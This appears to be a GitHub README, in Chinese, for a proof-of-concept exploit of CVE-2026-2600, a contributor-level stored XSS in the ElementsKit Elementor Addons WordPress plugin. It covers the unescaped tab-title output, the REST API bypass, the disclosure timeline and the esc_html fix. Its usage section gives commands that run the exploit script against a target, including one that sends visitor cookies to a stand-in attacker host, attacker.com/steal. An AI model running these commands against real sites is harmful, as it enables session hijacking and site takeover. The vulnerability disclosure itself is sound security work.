FOLKS-iwd/CVE-2026-2600-POC
GitHub: FOLKS-iwd/CVE-2026-2600-POC
展示 CVE-2026-2600 存储型 XSS 的 PoC,验证 Elementor Addons 漏洞的可利用路径与危害。
Stars: 1 | Forks: 0
# CVE-2026-2600
**ElementsKit Elementor Addons <= 3.7.9** — 认证用户(贡献者+)存储型跨站脚本
| | |
|---|---|
| **CVSS** | 6.4 中危 |
| **受影响版本** | <= 3.7.9 |
| **已修复版本** | 3.8.0 |
| **最低权限角色** | 贡献者(`edit_posts`) |
| **攻击向量** | 网络 / 低复杂度 / 低权限 |
## 漏洞详情
“Simple Tab”小工具使用 `echo` 输出 tab 标题,但未进行输出转义。在 `widgets/tab/tab.php` 中,渲染循环直接输出:
```
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
echo '' . $item['ekit_tab_title'] . '';
}
```
Elementor 的编辑器在客户端对输入进行了清理,但 REST API 端点(`/wp-json/wp/v2/posts/{id}`)直接接受 `_elementor_data` 元字段并完全绕过了该清理层。
已认证贡献者可以通过 PATCH 请求提交一个精心构造的 Elementor JSON 载荷,将 `ekit_tab_title` 字段设置为任意 HTML。由于该值会被原样存储在 `_elementor_data` 中并在渲染时直接 `echo` 而未使用 `esc_html()`,脚本会在每个访客加载页面时执行。
## 影响
任意贡献者可以:
- 窃取所有访客(包括管理员)的会话 Cookie 和认证令牌
- 劫持管理员账户并进一步完全控制站点
- 静默部署键盘记录器或凭证窃取覆盖层
- 将访客重定向到钓鱼页面或恶意软件分发站点
- 持久化篡改页面内容 — 载荷将持续存在直至手动移除
披露时已有 400K+ 次活跃安装受到影响。
## 使用方法
```
pip install requests
python3 poc.py https://target.com contributor p4ss
```
该脚本通过 HTTP 进行认证,从管理编辑器获取 REST 随机数(nonce),创建草稿文章,将包含 XSS 载荷的 `ekit_tab_title` 字段更新到 `_elementor_data`,并发布文章。输出结果确认载荷是否已生效。
```
# 自定义有效载荷
python3 poc.py https://target.com contributor p4ss --payload ''
# 使用回调的 Cookie 泄露
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal
# 交互式控制台模式
python3 console_poc.py
```
## 完整分析报告
https://folks-iwd.github.io/writeups/cve-2026-2600.html
## 披露时间线
| 日期 | 事件 |
|------|-------|
| 2026 年 1 月 | 通过 SVN 差异审查发现并确认 PoC |
| 2026 年 1 月 | 向 Patchstack Alliance 报告并提交完整分析报告与 PoC |
| 2026 年 3 月 | Wpmet 在 v3.8.0 中发布修复 |
| 2026 年 4 月 | CVE-2026-2600 公开披露。CVSS 评分为 6.4 中危 |
## 修复方案
Wpmet 在 `widgets/tab/tab.php` 中对 tab 标题输出添加了 `esc_html()`:
```
- echo '' . $item['ekit_tab_title'] . '';
+ echo '' . esc_html( $item['ekit_tab_title'] ) . '';
```
标签:Authenticated, CISA项目, Contributor, CVE, echo, ekit_tab_title, Elementor, _elementor_data, ElementsKit, esc_html, HTML 注入, JSON, OpenVAS, PHP, PoC, REST API, Stored XSS, StruQ, WordPress, WordPress 插件, XSS 攻击, 会话劫持, 威胁模拟, 数字签名, 暴力破解, 模糊测试, 注入漏洞, 自动化分析, 跨站脚本, 输出绕过, 逆向工具